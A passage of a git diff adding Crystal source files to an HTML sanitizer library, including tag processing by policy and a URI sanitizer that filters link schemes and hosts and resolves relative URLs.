+        @last_text_ended_with_whitespace = text.[-1].whitespace?
+      else
+        @last_text_ended_with_whitespace = false
+      end
+    end
+
+    def process_element(name : String, attributes : Hash(String, String), &)
+      process_element(name, attributes, @policy.transform_tag(name, attributes)) do
+        yield
+      end
+    end
+
+    def process_element(orig_name : String, attributes : Hash(String, String), name, &)
+      case name
+      when STOP
+        Log.debug { "#{@policy.class} stopping at tag #{orig_name} #{attributes}" }
+        if @policy.block_tag?(orig_name)
+          @stripped_block_tag = true
+        end
+        return
+      when CONTINUE
+        Log.debug { "#{@policy.class} stripping tag #{orig_name} #{attributes}" }
+        if @policy.block_tag?(orig_name)
+          @stripped_block_tag = true
+        end
+      when String
+        @stripped_block_tag = false
+        @adapter.start_tag(name, attributes)
+      end
+
+      yield
+
+      case name
+      when CONTINUE
+        if @policy.block_tag?(orig_name)
+          @stripped_block_tag = true
+        end
+      when String
+        @stripped_block_tag = false
+        @adapter.end_tag(name, attributes)
+      end
+    end
+
+    def reset
+      @last_text_ended_with_whitespace = true
+      @stripped_block_tag = false
+    end
+  end
+end
+
+require "./adapter/libxml2"
diff --git a/src/sanitize.cr b/src/sanitize.cr
new file mode 100644
index 0000000..a94e7c6
--- /dev/null
+++ b/src/sanitize.cr
@@ -0,0 +1,5 @@
+require "./policy/*"
+require "./processor"
+
+module Sanitize
+end
diff --git a/src/uri_sanitizer.cr b/src/uri_sanitizer.cr
new file mode 100644
index 0000000..d835b7c
--- /dev/null
+++ b/src/uri_sanitizer.cr
@@ -0,0 +1,91 @@
+require "uri"
+
+# A `URISanitizer` is used to validate and transform a URI based on specified
+# rules.
+class Sanitize::URISanitizer
+  # Specifies a whitelist of URI schemes this sanitizer accepts.
+  #
+  # If empty, no schemes are accepted (i.e. only relative URIs are valid).
+  # If `nil`, all schemes are accepted (this setting is potentially dangerous).
+  #
+  # Relative URIs are not affected by this setting.
+  property accepted_schemes : Set(String)?
+
+  # Specifies a whitelist of hosts this sanitizer accepts.
+  #
+  # If empty, no hosts are accepted (i.e. only relative URIs are valid).
+  # If `nil`, all hosts are accepted (default).
+  #
+  # The blacklist `rejected_hosts` has precedence over this whitelist.
+  property accepted_hosts : Set(String)?
+
+  # Specifies a blacklist of hosts this sanitizer rejects.
+  #
+  # If empty, no hosts are rejected.
+  #
+  # This blacklist has precedence over the whitelist `accepted_hosts`.
+  property rejected_hosts : Set(String) = Set(String).new
+
+  # Specifies a base URL all relative URLs are resolved against.
+  #
+  # If `nil`, relative URLs are not resolved.
+  property base_url : URI?
+
+  def initialize(@accepted_schemes : Set(String)? = Set{"http", "https", "mailto", "tel"})
+  end
+
+  # Adds *scheme* to `accepted_schemes`.
+  def accept_scheme(scheme : String)
+    schemes = self.accepted_schemes ||= Set(String).new
+    schemes << scheme
+  end
+
+  def sanitize(uri : URI) : URI?
+    unless accepts_scheme?(uri.scheme)
+      return nil
+    end
+
+    unless accepts_host?(uri.host)
+      return nil
+    end
+
+    uri = resolve_base_url(uri)
+
+    uri
+  end
+
+  def accepts_scheme?(scheme)
+    if scheme.nil?
+      return true
+    end
+
+    if accepted_schemes = self.accepted_schemes
+      return accepted_schemes.includes?(scheme)
+    end
+
+    true
+  end
+
+  def accepts_host?(host)
+    if host.nil?
+      return true
+    end
+
+    return false if rejected_hosts.includes?(host)
+
+    if accepted_hosts = self.accepted_hosts
+      return false unless accepted_hosts.includes?(host)
+    end
+
+    true
+  end
+
+  def resolve_base_url(uri)
+    if base_url = self.base_url
+      unless uri.absolute?
+        uri = base_url.resolve(uri)
+      end
+    end
+    uri
+  end
+end